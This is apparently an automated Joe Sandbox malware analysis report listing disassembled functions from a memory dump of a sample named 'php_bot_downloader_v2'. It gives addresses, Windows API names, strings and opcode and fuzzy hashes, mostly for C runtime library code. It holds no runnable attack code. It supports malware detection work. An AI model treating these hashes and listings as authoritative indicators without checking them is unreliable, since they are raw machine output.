                                                • API ID: ErrorLastNameTranslate$CodePageValid
                                                • String ID: utf8
                                                • API String ID: 2136749100-905460609
                                                • Opcode ID: 8795c1ca57517d0ee33c5efd6a110edb410aab17e38896b6a3b078346c8e3214
                                                • Instruction ID: 9d69562e26782fd866302e4c5761701d83144096c332e1aacad8d0f425e0eb74
                                                • Opcode Fuzzy Hash: 8795c1ca57517d0ee33c5efd6a110edb410aab17e38896b6a3b078346c8e3214
                                                • Instruction Fuzzy Hash: A5917232A0876285FB209F31D4416B922B4EBC4B80F584131DF9DA7BA5DFBCE952C748
                                                Function 00007FF658E46124 Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                • String ID:
                                                • API String ID: 3939093798-0
                                                • Opcode ID: 7969b85a61de7c679f36e1ce11fb21f2a0dcb3cc90bb66e5a32ed9d794ab482a
                                                • Instruction ID: c79192b61d40018589995aac3dcf3f52814d9ce582f338af14237ad1bbd832a9
                                                • Opcode Fuzzy Hash: 7969b85a61de7c679f36e1ce11fb21f2a0dcb3cc90bb66e5a32ed9d794ab482a
                                                • Instruction Fuzzy Hash: FD716C22F1866296FB509FB0D8506BD23B0AFC6744F484035CA9DA7EB5EF7CA845C348
                                                Function 00007FF658E333E8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: 05709c85ac3bff629390b2c4b53dddbe1b161458e9038d03406674f5307f74fc
                                                • Instruction ID: c6e0df34ed9bf5807ad5ea6f066c5458b3655d95a2c381a8336d267e4b46c745
                                                • Opcode Fuzzy Hash: 05709c85ac3bff629390b2c4b53dddbe1b161458e9038d03406674f5307f74fc
                                                • Instruction Fuzzy Hash: 19316F32608B9186EB648F75E8406AE73B0FBC8754F580136EA8E93B65DF3CD5458B04
                                                Function 00007FF658E3D480 Relevance: 7.8, APIs: 5, Instructions: 321fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$Console
                                                • String ID:
                                                • API String ID: 786612050-0
                                                • Opcode ID: 24cd3cdbab8cee30782a7feae1c3d4c10b640a4d0206876898aeb659ed1b6fe6
                                                • Instruction ID: e6b25402bccc1ff786dd7eaa5048381bdd0cd7d7211a4894cbeffb90037382f3
                                                • Opcode Fuzzy Hash: 24cd3cdbab8cee30782a7feae1c3d4c10b640a4d0206876898aeb659ed1b6fe6
                                                • Instruction Fuzzy Hash: 6BD1BD72B08A919AE701CB74D4401FD77B1FB85798B180136DE8EA7FA9DE38E956C304
                                                Function 00007FF658E3C750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: InfoLocaletry_get_function
                                                • String ID: GetLocaleInfoEx
                                                • API String ID: 2200034068-2904428671
                                                • Opcode ID: 04d93355dd70c33fdd0e32921199d88a5f50c64ece7ab3e10c8725350256a896
                                                • Instruction ID: d0921e2efc267f6a60b542d4a05f5a0a40c0f2d8bf3b1d76b3394c585b98a9eb
                                                • Opcode Fuzzy Hash: 04d93355dd70c33fdd0e32921199d88a5f50c64ece7ab3e10c8725350256a896
                                                • Instruction Fuzzy Hash: 4C016225B08B6182E7109B76B5404AAA670AFD4BC0F5C4035DE4DB7F6ADF3CE9418348
                                                Function 00007FF658E45BA4 Relevance: 4.7, APIs: 3, Instructions: 169COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3644580040-0
                                                • Opcode ID: 84329821f6c6552426cba0fea29145c8ab0cfcceb8bcfe988b16f5a8ed808b17
                                                • Instruction ID: acafba77e2bd8cddca8adbc69f5bd470369264f3b86068ea2b3f2d17db699a21
                                                • Opcode Fuzzy Hash: 84329821f6c6552426cba0fea29145c8ab0cfcceb8bcfe988b16f5a8ed808b17
                                                • Instruction Fuzzy Hash: 20618D32A0865296EB348F25E4442BA63B1FBC4740F088135CBDEE7AA1DFBDE456C744
                                                Function 00007FF658E42110 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e09e4de5ea58db5dde88890803a2c25b2a26de96d3ba3b2c2c97df7dddcc91ec
                                                • Instruction ID: bf2563bc6ecf0cae95babbcdc112d54b6574cde40430dbf41c4eea4e476ce531
                                                • Opcode Fuzzy Hash: e09e4de5ea58db5dde88890803a2c25b2a26de96d3ba3b2c2c97df7dddcc91ec
                                                • Instruction Fuzzy Hash: 5551D622B087A145F7209B76A8002AE7BB5BB84BD4F184135EE9DA7FA9CF3CD501C704
                                                Function 00007FF658E45DF0 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale
                                                • String ID:
                                                • API String ID: 3736152602-0
                                                • Opcode ID: 0b04348005e901afcdceab8ec3453e4ffe4878e1c9c447050cf3ffce1a24f67e
                                                • Instruction ID: 8ee215027eda3646f8e72e03630542eda1d1dffa73b79927574aaaa9048c8969
                                                • Opcode Fuzzy Hash: 0b04348005e901afcdceab8ec3453e4ffe4878e1c9c447050cf3ffce1a24f67e
                                                • Instruction Fuzzy Hash: 29317532B0869286EB648F31E4413BA72B1EBC4780F489135DB9DD7AA5DF7CF4458704
                                                Function 00007FF658E45A3C Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00007FF658E3BF24: GetLastError.KERNEL32 ref: 00007FF658E3BF33
                                                  • Part of subcall function 00007FF658E3BF24: SetLastError.KERNEL32 ref: 00007FF658E3BFD1
                                                • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF658E46227,?,00000000,00000092,?,?,00000000,?,00007FF658E3A2C1), ref: 00007FF658E45ADA
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2417226690-0
                                                • Opcode ID: 21965390a1c3b04c68f5e4ec23e5f88de4ffcdd1d21c48c2fab9df89b6a6053c
                                                • Instruction ID: abf478c8e687a159a7c278bada936bbb808f2a8fdbb423e54c087d244c57749a
                                                • Opcode Fuzzy Hash: 21965390a1c3b04c68f5e4ec23e5f88de4ffcdd1d21c48c2fab9df89b6a6053c
                                                • Instruction Fuzzy Hash: A711D563A086558AEB158F25D4802B877B0EBC0B90F488135C6AD977E0DEB8D9D2D744
                                                Function 00007FF658E45FF8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00007FF658E3BF24: GetLastError.KERNEL32 ref: 00007FF658E3BF33
                                                  • Part of subcall function 00007FF658E3BF24: SetLastError.KERNEL32 ref: 00007FF658E3BFD1
                                                • GetLocaleInfoW.KERNEL32(?,?,?,00007FF658E45DA1), ref: 00007FF658E4602F
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale
                                                • String ID:
                                                • API String ID: 3736152602-0
                                                • Opcode ID: bb8189504487f5a985e51ce05a45f2a6c514b1516119dd71c496efc00cac7e49
                                                • Instruction ID: b6c6b2cb5f3e4505e2b1fe4d94ac0cdd1de82ae269b8b9d365b9aaad1755d673
                                                • Opcode Fuzzy Hash: bb8189504487f5a985e51ce05a45f2a6c514b1516119dd71c496efc00cac7e49
                                                • Instruction Fuzzy Hash: A1112B22A1C56282F7748B3190006792271EB82754F085131DAAD97EF6DE39E8808744
                                                Function 00007FF658E45B0C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00007FF658E3BF24: GetLastError.KERNEL32 ref: 00007FF658E3BF33
                                                  • Part of subcall function 00007FF658E3BF24: SetLastError.KERNEL32 ref: 00007FF658E3BFD1
                                                • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF658E461E3,?,00000000,00000092,?,?,00000000,?,00007FF658E3A2C1), ref: 00007FF658E45B8A
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2417226690-0
                                                • Opcode ID: 951fbc0144a62e947e75b3a87fb31fcb36c33691a4992eb0475a1d0e2da3f676
                                                • Instruction ID: 608b4528ef304b55841e7c376f70f51b0ea40eb38a3dadd2bc867f76c6455788
                                                • Opcode Fuzzy Hash: 951fbc0144a62e947e75b3a87fb31fcb36c33691a4992eb0475a1d0e2da3f676
                                                • Instruction Fuzzy Hash: E001B562E0829686E7144F35E4407B976F1EBC07A4F499231D6AD97AE4CFB89886C708
                                                Function 00007FF658E3C2AC Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF658E3C611,?,?,?,?,?,?,?,?,00000000,00007FF658E45088), ref: 00007FF658E3C2FB
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2099609381-0
                                                • Opcode ID: f39889105c39c1e7d9cdfb83f93b998eaff1662254749335195303e6102d8e5c
                                                • Instruction ID: 55db8c06d2a59c46bf9472b50a850040522a4f6955f8695ed6bafed66e2e0c16
                                                • Opcode Fuzzy Hash: f39889105c39c1e7d9cdfb83f93b998eaff1662254749335195303e6102d8e5c
                                                • Instruction Fuzzy Hash: FFF04672A08B5183E6009B76F8911A963B1FB997C0F5C9135EA4DE3B64DE3CE8518308
                                                Function 00007FF658E43384 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: 8e49f534ba95581dd22a75685f66825aeb5385678599c58abc7a6036454363c2
                                                • Instruction ID: bae1d8f1487f033c83fa3ca3aa436f8d01b0dbd0c5c3157fc74c1014c4956269
                                                • Opcode Fuzzy Hash: 8e49f534ba95581dd22a75685f66825aeb5385678599c58abc7a6036454363c2
                                                • Instruction Fuzzy Hash: F5B09224E17A16C2EA092B726C4631422B87F88782F8C8038C14CE1720EF3C24A58704
                                                Function 00007FF658E413D0 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 60b6fb8d0248c970776ccc8624822a80e785400b24caab2435ad90ec9a6ba0a7
                                                • Instruction ID: 32ca55e5547577bbc5e8bbb4ba0f4a319793ac00b84927a1f821fc0ba4aa5192
                                                • Opcode Fuzzy Hash: 60b6fb8d0248c970776ccc8624822a80e785400b24caab2435ad90ec9a6ba0a7
                                                • Instruction Fuzzy Hash: 5DF06271B192A5CEDFA99F39B84262A77E0E748380F948039D68DC3F14DA3C90609F08
                                                Function 00007FF658E2DEF0 Relevance: .0, Instructions: 2COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95e507c8ea33960a97f08222a6a90f76330df96898f3661f46b3fbdcd566cc28
                                                • Instruction ID: cd7287b9e2100a812c849d81c5c4fe32be10fdf0a6564ba095d0b82c0b668c86
                                                • Opcode Fuzzy Hash: 95e507c8ea33960a97f08222a6a90f76330df96898f3661f46b3fbdcd566cc28
                                                • Instruction Fuzzy Hash: EDA00121A0C82AD0F7448B61A8500342230AB90301B580031D14EA69A89E7DA4808208
                                                Function 00007FF658E3CAC0 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CADB
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CAFA
                                                  • Part of subcall function 00007FF658E3C328: GetProcAddress.KERNEL32(?,?,00000006,00007FF658E3C72A,?,?,?,00007FF658E3C0EA,?,?,?,00007FF658E35E2D), ref: 00007FF658E3C480
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CB19
                                                  • Part of subcall function 00007FF658E3C328: LoadLibraryExW.KERNEL32(?,?,00000006,00007FF658E3C72A,?,?,?,00007FF658E3C0EA,?,?,?,00007FF658E35E2D), ref: 00007FF658E3C3CB
                                                  • Part of subcall function 00007FF658E3C328: GetLastError.KERNEL32(?,?,00000006,00007FF658E3C72A,?,?,?,00007FF658E3C0EA,?,?,?,00007FF658E35E2D), ref: 00007FF658E3C3D9
                                                  • Part of subcall function 00007FF658E3C328: LoadLibraryExW.KERNEL32(?,?,00000006,00007FF658E3C72A,?,?,?,00007FF658E3C0EA,?,?,?,00007FF658E35E2D), ref: 00007FF658E3C41B
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CB38
                                                  • Part of subcall function 00007FF658E3C328: FreeLibrary.KERNEL32(?,?,00000006,00007FF658E3C72A,?,?,?,00007FF658E3C0EA,?,?,?,00007FF658E35E2D), ref: 00007FF658E3C454
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CB57
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CB76
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CB95
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CBB4
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CBD3
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CBF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                • API String ID: 3255926029-3252031757
                                                • Opcode ID: b010464cf2b1cba93bad182734da8025cbabf81e56ab9118fdcaeaff9242ecd3
                                                • Instruction ID: 1f86c626bf18de415d3331364466c7b152ba1811edcd46ec2598609aa10a3a09
                                                • Opcode Fuzzy Hash: b010464cf2b1cba93bad182734da8025cbabf81e56ab9118fdcaeaff9242ecd3
                                                • Instruction Fuzzy Hash: 583181E5908B2BA0FA04DB70E9515E82731FF54318FC90473D10DB29B19F3CAA4AD349
                                                Function 00007FF658E2D42C Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin__scrt_fastfail
                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                • API String ID: 2680415206-3242537097
